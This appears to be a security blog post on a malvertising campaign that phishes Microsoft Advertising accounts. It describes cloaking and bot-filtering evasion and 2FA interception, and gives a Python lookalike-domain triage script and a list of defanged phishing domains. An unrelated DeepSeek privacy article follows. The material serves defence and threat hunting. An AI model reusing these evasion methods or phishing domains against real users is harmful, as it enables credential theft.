Figure 1: A Google search for ‘microsoft ads’

Redirection, cloaking and Cloudflare

The threat actors are using different techniques to evade detection and drop traffic from bots, security scanners and crawlers. Unwanted IP addresses (e.g. VPNs) are immediately redirected to a bogus marketing website (Figure 2). This is also known as a “white page”, meaning it looks innocent and hides its maliciousness.

Figure 2: Cloaking page

Users who appear to be genuine are presented with a Cloudflare challenge to verify they are human. This is a legitimate instance of Cloudflare, unlike the “ClickFix” type of attacks that have become very commonplace and trick people into pasting and executing malicious code.

Figure 3: Cloudflare verification

Rickroll for the cheaters

After a successful Cloudflare check, users are redirected to the final phishing page via a special URL that acts as an entry point for the malicious domain ads[.]mcrosoftt[.]com. You can see the network requests related to this redirection chain in Figure 4 below.

Figure 4: Network traffic for full redirection

If you were to visit that domain directly instead of going through the proper ad click, you’d be greeted with a rickroll, an internet meme designed to make fun of someone. The web sandbox urlscan.io has several examples of crawl requests for URLs on that server (37.120.222[.]165) that all went to the rickroll.

Figure 5: Rickroll redirect

Phishing page

After much subversion, real victims finally see the phishing page for the Microsoft Advertising platform. The full URL in the address bar is meant to imitate the legitimate one (ads.microsoft.com).

Figure 6: Microsoft Advertising phishing page

The phishing page gives users a fake error message enticing them to reset their password and seemingly tries to get past 2-Step verification as well. Handling 2FA has become a standard feature in most phishing kits, due to the rise in user adoption of this additional security layer.

Figure 7: Phishing steps

Larger campaign

Going back to urlscan.io, we fed it the special entry URL and it was able to navigate to the phishing page. From there, we can look at the various web requests and find something to pivot on in order to identify additional infrastructure.

The favicon.ico file is one starting point and we can query for any scans that match its hash, excluding the official Microsoft domain. The results show that in the past week, there were several other domains that appear to be related to the theft of Microsoft Ads accounts.

But this campaign appears to go back further, at least a couple of years and maybe more, although it becomes somewhat tricky to know whether the malicious infrastructure is tied to the same threat actors. It’s worth noting that several of the domains are either hosted in Brazil or have the ‘.com.br’ Brazilian top-level domain.

What we discovered may only be the tip of the iceberg; by starting to investigate compromised advertiser accounts we may very well have opened Pandora’s box. This isn’t only about Google or Microsoft ad accounts, but potentially Facebook and many others. Of course, our scope so far has been Google Search, but we know that other platforms are rife with such phishing attacks.

These recent malvertising campaigns highlight the ongoing threat of phishing through online advertising. While tech companies like Google work to combat these issues, users must remain vigilant. Here are some key steps you can take to protect yourself:

  • Verify URLs: Always carefully examine the URL in your browser’s address bar before entering any credentials. Scrutinize URLs for inconsistencies or misspellings.
  • Use 2-Step verification wisely: it adds an extra layer of security to your accounts, but you still need to pay attention to requests before granting them access.
  • Regularly monitor your accounts: Check your advertising accounts for any suspicious activity such as changes in administrator accounts.
  • Report Ads: If you encounter a suspicious ad, report it for the benefit of other users.
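The URL check in the first bullet can be partly automated by a defender triaging IOC feeds. The following is an added example (not Malwarebytes’ code) that refangs indicators written in the `[.]` style used in the list below and flags hostname labels that imitate a brand: an exact brand label on a domain outside a small allowlist, a brand name embedded in a longer label, and a label within a small edit distance of a brand after common homoglyph substitution (rn for m, vv for w, 0 for o). The brand list, the allowlist (microsoft.com, bing.com, kraken.com), the homoglyph table and the short multi-label suffix table are assumptions for the example; the sample hostnames are taken from the IOC list in this post.

```python
"""Lookalike-domain triage for defanged IOC lists (added example, not page code)."""

# Brands that the IOC list in this post imitates. The allowlist of genuine
# registrable domains is an assumption made for this example.
BRANDS = ("microsoft", "bing", "kraken")
ALLOWLIST = {"microsoft.com", "bing.com", "kraken.com"}

# Approximation of a public-suffix list, limited to suffixes seen in the IOCs.
MULTI_LABEL_SUFFIXES = {"com.br", "com.hr", "com.cn"}

# Homoglyph substitutions applied before measuring edit distance (assumed table).
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"))


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as ads[.]mlcr0soft[.]com into a hostname."""
    return ioc.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def normalize(label: str) -> str:
    """Collapse common homoglyph tricks so 'rnlcr0soft' compares as 'mlcrosoft'."""
    for glyph, plain in HOMOGLYPHS:
        label = label.replace(glyph, plain)
    return label


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus adjacent transpositions,
    so 'microosft' is one edit away from 'microsoft'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def registrable_domain(host: str) -> str:
    """Last two labels, or three when the suffix itself has two labels (com.br)."""
    labels = host.split(".")
    n = 3 if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def triage(ioc: str) -> list:
    """Return (token, brand, reason) findings for one defanged hostname.

    An empty list means the host is either allowlisted or shows no brand imitation
    under these heuristics; it is a triage aid, not proof of legitimacy."""
    host = refang(ioc)
    reg = registrable_domain(host)
    if reg in ALLOWLIST:
        return []
    labels = host.split(".")
    suffix_len = len(reg.split(".")) - 1          # public-suffix labels to ignore
    tokens = [t for label in labels[:-suffix_len] for t in label.split("-") if t]
    findings = []
    for token in tokens:
        norm = normalize(token)
        for brand in BRANDS:
            if norm == brand:
                findings.append((token, brand, "exact brand label"))
            elif brand in norm:
                findings.append((token, brand, "embeds brand"))
            else:
                limit = 1 if len(brand) <= 5 else 2   # short brands get a tighter bound
                dist = osa_distance(norm, brand)
                if dist <= limit:
                    findings.append((token, brand, f"edit distance {dist}"))
    return findings


if __name__ == "__main__":
    # Sample indicators copied from the IOC list in this post.
    for sample in ("ads[.]microsoft[.]com", "ads[.]mlcr0soft[.]com",
                   "ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge",
                   "microosft[.]accounts-ads[.]site", "wvvw-microsoft[.]xyz",
                   "portfoliokrakenus[.]com"):
        print(refang(sample), "->", triage(sample) or "no finding")
```

The allowlist check runs before any scoring so that the genuine `ads.microsoft.com` never produces a finding, while `ads.microsoft.com.euroinvest.ge` does, because its registrable domain is `euroinvest.ge`. The edit-distance bound is deliberately loose for long brand names; a miss such as `blngmicro` (no single brand within range) is the price of keeping false positives low on ordinary words.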

We don’t just report on threats—we block them

Malwarebytes Browser Guard offers traditional ad-blocking augmented with advanced heuristic detection. Download it today.

Indicators of Compromise

The following IOCs consist of domains that shared attributes with our initial phishing page, including the favicon and images. Some of them go back further but are provided for threat hunters who may wish to further investigate these campaigns.

30yp[.]com
aboutadvertselive[.]com
aboutblngmicro[.]cloud
account-microsoft[.]online
account-microsoft[.]site
account-mircrosoft-ads[.]com
account[.]colndcx-app[.]com
accounts-ads[.]site
accounts-mircrosoft-ads[.]online
acount-exchang[.]store
admicrosoft[.]com
admicrsdft[.]com
ads-adversitingb[.]com
ads-dsas[.]site
ads-microsoft[.]click
ads-microsoft[.]coachb-learning[.]com
ads-microsoft[.]live
ads-microsoft[.]lubrine[.]com[.]br
ads-microsoft[.]online
ads-microsoft[.]shop
ads-microsoftz[.]online
ads-miicrosoft[.]com
ads-mlcrosft[.]com
ads-mlcrosoft-com[.]blokchaln[.]com
ads[.]microsoft[.]com[.]euroinvest[.]ge
ads[.]mlcr0soft[.]com
ads[.]mlcrosoft[.]com[.]ciree[.]com[.]br
ads[.]mlcrosoft[.]com[.]poezija[.]com[.]hr
ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge
adslbing[.]com
adsmicro[.]exchangefastex[.]cloud
adsmicrosoft[.]shop
adsverstoni[.]com
advertiseliveonline[.]com
advertising-bing[.]site
advertising-mlcrosoft[.]org
adverts2023[.]online
advertsingsinginbing[.]com
agency-wasabi[.]com
app[.]beefylswap[.]top
bîlkub[.]com
bing-ads[.]com
bing[.]login-acount[.]me
bitmax-us[.]com
blngad[.]online
blseaccount[.]cloud
bltrue[.]colnhouse-fr[.]us
côinlíst[.]online
colneex-plalform[.]cloud
connec-exchan[.]site
digitechmedia[.]agency
forteautomobile[.]com
global-verifications[.]com
global-verify[.]com
homee-acount[.]com
itlinks[.]com[.]cn
krakeri-login[.]com
login-adsmicrosoft[.]helpexellent[.]com
login[.]adsadvertising[.]online
login[.]microsofttclicks[.]live
micrasofit[.]xyz
microosft[.]accounts-ads[.]site
microsoft-ads[.]website
microsoftadss[.]com
microsoftadversiting[.]cloud
microsoftbingads[.]com
microsofyt[.]adversing-publicidade[.]pro
mictrest[.]mnws[.]ru
mlcrosoft-bing-acces[.]click
mlcrosoftadvertlsing[.]online
mudinhox[.]site
ndnet[.]shop
phlyd[.]com
portfoliokrakenus[.]com
portfoliolkraken[.]com
portfoliopro-us[.]com
portfolioskranen[.]com
portofolioprospots[.]com
potfoliokeiolenen[.]com
potfoliokelaken[.]com
potfoliokelaneken[.]com
potfoliokenaiken[.]com
potfoliokenkren[.]com
potfolioketonelen[.]com
potfolioskaneken[.]com
potfolioskenaken[.]com
potfolioskraineken[.]com
potfolioskranaken[.]com
potfolioskraneken[.]com
pro-digitalus[.]com
prokrakenportfolio[.]com
rnlcrosoft[.]smartlabor[.]it
sig-in-mlcrosoft-advertisings[.]site
uiiadvertise[.]online
wvvw-microsoft[.]xyz
www-bingads[.]com
www-microsoftsads[.]com
www-v[.]userads[.]digital
www34[.]con-webs[.]com
www55[.]con-webs[.]com

ads-microsoft[.]bewears[.]com
ads[.]msicrosoft[.]com

The DeepSeek controversy: Authorities ask where does the data come from and how safe is it?

The sudden rise of DeepSeek has raised concerns and questions, especially about the origin and destination of the training data, as well as the security of the data.

For those returning from a short holiday away from the news, DeepSeek is a new player in the Artificial Intelligence (AI) field. The Chinese startup has certainly taken the app stores by storm: just a week after its launch it topped the charts as the most downloaded free app in the US. This caused an upset on the stock markets that cost Nvidia and Oracle shareholders a lot of money.

DeepSeek has been called an open-source project; however, this is technically not true, because only the model’s outputs and certain aspects are publicly accessible. That makes it an open-weight model. Either way, the important difference is that the underlying training data and the code necessary for full reproduction of the models are not fully disclosed.

And it’s the data that poses a concern to many. OpenAI has accused DeepSeek of using its ChatGPT model to train DeepSeek’s AI chatbot, which triggered quite a few memes, if only because OpenAI previously faced accusations of using data that was not its own to train ChatGPT.

You're trying to kidnap what I've rightfully stolen

Authorities have started to ask questions as well. The Italian privacy regulator GPDP has asked DeepSeek to provide information about the data it processes in the chatbot, and about its training data. Because it sees a risk to the privacy of millions of Italian citizens, GPDP has demanded that DeepSeek answer within 20 days questions about:

  • Which personal data is collected
  • The origin of the data
  • Purpose for the collection
  • Whether the data is stored on servers in China

According to the Italian press agency ANSA, DeepSeek disappeared on January 29, 2025 from Google and Apple’s app stores in Italy.

And if all that isn’t scary enough, researchers at Wiz have found a publicly accessible database belonging to DeepSeek.

“This database contained a significant volume of chat history, backend data and sensitive information, including log streams, API Secrets, and operational details.”

The database was not just accessible and readable, it was also open to control and privilege escalation within the DeepSeek environment. No authentication was required, so anybody who stumbled upon the database was able to run queries to retrieve sensitive logs and actual plaintext chat messages, and even to steal plaintext passwords and local files.

Needless to say, this oversight put DeepSeek and its users at risk.

We have said this before and we’ll probably have to repeat it numerous times, but the need for fast developments in this field is creating privacy risks that we have never seen before, simply because security is an afterthought for the developers. So, no matter which AI chatbot you prefer, always be mindful of the information you feed it: It may find its way to unexpected and undesirable places.
